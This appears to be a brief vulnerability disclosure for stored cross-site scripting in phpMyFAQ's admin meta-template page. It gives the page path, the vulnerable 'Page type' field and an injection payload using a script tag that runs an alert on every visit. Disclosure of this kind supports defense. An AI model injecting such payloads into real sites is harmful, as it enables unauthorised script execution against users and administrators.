Description

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites.

Proof of Concept

Visit: http://<ip>/phpmyfaq/admin/?action=meta
Click button Add template meta data
Inject payload in field Page type: "><script>alert(“XSS”)</script> and Save
Every time you go to http://<ip>/phpmyfaq/admin/?action=meta, payload XSS will execute
Image POC: https://drive.google.com/file/d/1iezIdmxcCBY8G714AUFGIm3fI145yiC1/view?usp=sharing